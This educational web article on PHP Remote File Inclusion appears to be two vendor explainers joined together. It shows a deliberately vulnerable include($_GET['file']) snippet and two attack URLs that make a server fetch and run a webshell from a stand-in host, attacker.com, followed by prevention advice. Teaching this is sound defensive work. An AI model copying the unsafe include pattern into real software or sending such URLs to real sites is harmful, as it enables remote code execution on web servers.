What is Remote File Inclusion (RFI)?
Remote File inclusion (RFI) refers to an inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts. The consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution.
Remote File Inclusion (RFI) usually occurs, when an application receives the path to the file that has to be included as an input without properly sanitizing it. This would allow an external URL to be supplied to the include statement.
The following is an example in PHP that is vulnerable to Remote File Inclusion (RFI).
/**
* Get the filename from a GET input
* Example - http://example.com/?file=filename.php
*/
$file = $_GET['file'];
/**
* Unsafely include the file
* Example - filename.php
*/
include($file);
In the above example, an attacker could make the following request to trick the application into executing a malicious script such as a webshell.
http://example.com/?file=http://attacker.com/evil.php
In this example, the remote file will be included and run with the user privileges the web application is running. That would allow an attacker to run any code they wanted on the web server, including writing files to gain persistence on the web server.
Preventing Remote File Inclusion (RFI) vulnerabilities
The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included.
Additionally, in the case of PHP, most modern PHP configurations are configured with
allow_url_include set to off, which would not allow malicious users to include remote files. This being said, Local File Inclusion (LFI) would still be possible.What is the Remote File Inclusion vulnerability?
Introduction to the Remote File Inclusion (RFI) Vulnerability
A remote file inclusion occurs when a file from a remote server is inserted into a web page. This can be done on purpose to display content on a website from a remote website. But, it can also happen by accident, due to a misconfiguration of the respective programming language or during an attack.
Even though this kind of inclusion can occur in almost every kind of web application, those written in PHP are more likely to to be vulnerable to Remote File Inclusion attacks, because PHP provides native functions that allow the inclusion of remote files. Other languages usually require a workaround to imitate this behavior.
How Does Remote File Inclusion work?
In order to include a remote file you have to add a string with the url of the file to an Include function of the respective language (for example, PHP). Then the web server of the website under attack makes a request to the remote file, fetches its contents and includes it on the web page serving the content. It is then processed by the parser of the language.
How Can a Web Application Be Vulnerable to a Remote File Inclusion?
By default, RFI is often disabled. PHP, for example, introduced the php.ini configuration option in 5.2.0 to disable RFI. There are only a few scenarios where it is actually needed. Sometimes developers enabled it on purpose, and sometimes it is enabled by default on older versions of the server side programming language.
Usually developers enable such functionality to allow them to include a local file, but without proper input validation, it is also possible to fetch data from a remote server. Therefore, in most cases when such functionality is enabled, the web application becomes vulnerable to both Remote File Inclusion and Local File Inclusion (LFI).
Exploiting a Remote File Inclusion Vulnerability
Consider a developer who wants to include a local file depending on the GET parameter page. They have different files such as contact.php, main.php and about.php, all of which provide different functionality to the website.
Each file can be called using the following request:
https://example.com/index.php?page=contact.php
While the developer expects that only files inside that folder are included, it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI). In fact, without a whitelist (of permitted files), the attacker is able to change the filepath to the programming language’s Include function. The attacker can include a local file, but in a typical attack, they change the path to a file that resides on a server they control. That way, that attacked can easily write malicious code inside a file, without having to poison logs or otherwise inject code inside the web server (which is what is required in the case of an LFI).
An attack might look like this:
https://example.com/index.php?page=https://attacker.com/uploads/webshell.txtWhat is the Impact of an Exploited Remote File Inclusion?
Impact may differ depending on the execution permissions of the web server user. Any included source code could be executed by the web server with the privileges of the current the web server user, making it possible to execute arbitrary code. Where the web server user has administrative privileges, full system compromise is also possible.
How to Prevent Remote File Inclusion Vulnerabilities
To prevent exploitation of the RFI vulnerability, ensure that you disable the remote inclusion feature in your programming languages' configuration, especially if you do not need it. In PHP, you can set allow_url_include to '0'. You should also validate user input before passing it to an Include function. The recommended way to do this is with a whitelist of permitted files.
Vulnerability Classification and Severity Table
| Classification | ID / Severity |
|---|---|
| PCI v3.1 | 6.5.1 |
| PCI v3.2 | 6.5.1 |
| OWASP 2013 | A1 |
| CWE | 98 |
| CAPEC | 193 |
| WASC | 5 |
| HIPAA | 164.306(a) |
| CVSS:3.0 |
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
| Netsparker | Critical |
No comments:
Write comments